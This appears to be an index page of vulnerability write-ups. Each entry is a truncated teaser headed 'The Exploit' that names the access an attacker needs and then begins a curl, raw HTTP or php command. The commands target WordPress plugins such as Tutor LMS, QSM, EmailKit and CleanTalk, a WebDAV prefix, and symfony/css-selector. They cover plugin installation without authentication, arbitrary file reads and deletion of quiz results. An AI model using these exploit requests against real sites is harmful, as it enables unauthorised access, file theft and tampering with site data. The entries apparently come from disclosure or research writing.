## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...
## The Exploit Authenticated subscriber-level users can directly call Tutor LMS's course completion AJAX handler and mark any course complete. ```bash curl 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-www-f...
Read article →## The Exploit Requires an authenticated Subscriber-level account or higher. ```bash curl -i -s -X POST 'https://TARGET_HOST/wp-json/qsm/v1/questions/123' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'Cookie: wordpress_...
Read article →## The Exploit An authenticated attacker with Author-level privileges or higher can abuse `create_template` to read arbitrary files via the `emailkit-editor-template` REST parameter. ```bash curl -i -s -X POST 'https://<TARGET_HOST>/wp-js...
Read article →## The Exploit An authenticated user with Subscriber-level access or higher can delete QSM quiz results by POSTing a valid nonce and `result_id` to QSM’s AJAX delete endpoint. ```bash curl -i -X POST "https://example.com/wp-admin/admin-aj...
Read article →## The Exploit No authentication is required; an attacker only needs to control the CSS selector string passed into the affected `symfony/css-selector` parser. ```bash php -r 'require "vendor/autoload.php"; use Symfony\Component\CssSelect...
Read article →## The Exploit Attacker needs no authentication. ```bash curl -s -X POST 'https://TARGET/wp-admin/admin-ajax.php' \ -d 'action=qsm_get_quiz_to_reload&quiz_id=123' \ -H 'Content-Type: application/x-www-form-urlencoded' ``` The vulnera...
Read article →## The Exploit Authenticated attacker needs Contributor-level access or higher. ```http POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example.com Content-Type: application/x-www-form-urlencoded Cookie: wordpress_logged_in_XXXXXXXXXX...
Read article →## The Exploit An unauthenticated attacker with network access and an IP whose reverse DNS resolves to a domain containing `cleantalk.org` can call the CleanTalk remote API and install plugins without a token. ```bash curl -i -X POST 'htt...
Read article →## The Exploit Attacker needs no valid CleanTalk API key or authenticated WordPress session. ```bash curl -i -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \ -H "Content-Type: application/x-www-form-urlencoded" \ --data-urlenc...
Read article →